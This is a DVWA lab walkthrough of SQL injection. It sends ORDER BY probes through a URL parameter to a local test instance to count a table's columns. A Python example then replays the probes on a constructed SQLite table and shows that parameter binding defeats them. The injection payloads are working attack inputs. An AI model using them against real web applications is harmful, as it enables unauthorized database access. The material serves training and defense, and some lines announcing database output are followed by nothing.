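DVWA source code
The source code shows that this is a string-type (quoted) injection.
This challenge passes the parameter with the GET method, so the parameter can be edited directly in the URL.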
127.0.0.1:82/vulnerabilities/sqli/?id=1' order by 1#&Submit=Submit#
PHP executes:
$query = "SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1#;";
The backend database executes:
127.0.0.1:82/vulnerabilities/sqli/?id=1' order by 2#&Submit=Submit#
PHP executes:
$query = "SELECT first_name, last_name FROM users WHERE user_id = '1' order by 2#;";
The backend database executes:
127.0.0.1:82/vulnerabilities/sqli/?id=1' order by 3#&Submit=Submit#
PHP executes:
$query = "SELECT first_name, last_name FROM users WHERE user_id = '1' order by 3#;";
The backend database executes:
From the probes above, the data table has only 2 columns.
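Why the third probe behaves differently, and how binding the parameter removes that signal, shown as an added example that is not code from this page or from DVWA. It assumes an in-memory SQLite table with constructed contents in place of DVWA's MySQL database, so the `#` comment is replaced by `-- ` (SQLite has no `#` comments); all function names are hypothetical.

```python
import sqlite3

# Constructed stand-in for the users table (SQLite in memory, not DVWA's MySQL).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, "
               "last_name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('1', 'admin', 'admin', 'constructed')")
    return db

def run(db, sql, params=()):
    """Return ('ok', rows) or ('error', message), like a page that echoes DB errors."""
    try:
        return ("ok", db.execute(sql, params).fetchall())
    except sqlite3.Error as exc:
        return ("error", str(exc))

def lookup_concat(db, user_id):
    # Vulnerable: the value is pasted between the quotes, as in the page's $query,
    # so a quote in the input ends the string and the rest is parsed as SQL.
    return run(db, "SELECT first_name, last_name FROM users "
                   "WHERE user_id = '" + user_id + "';")

def lookup_bound(db, user_id):
    # Hardened: the value is bound as data and is never parsed as SQL.
    return run(db, "SELECT first_name, last_name FROM users WHERE user_id = ?",
               (user_id,))

# The page's three probes, with '-- ' instead of '#' (SQLite assumption).
PROBES = ["1' order by %d-- " % n for n in (1, 2, 3)]

def compare(db):
    """Map each probe to (status with concatenation, status with binding)."""
    return {p: (lookup_concat(db, p)[0], lookup_bound(db, p)[0]) for p in PROBES}

if __name__ == "__main__":
    db = make_db()
    # ORDER BY n indexes the SELECT list (2 columns here), so n=3 raises an error
    # only when the input reaches the SQL parser.
    for probe, (vuln, safe) in compare(db).items():
        print(f"{probe!r:24} concat={vuln:6} bound={safe}")
    print("legitimate id with binding:", lookup_bound(db, "1"))
```

With binding, all three probes return an empty result with no error, so the response no longer differs between `order by 2` and `order by 3`.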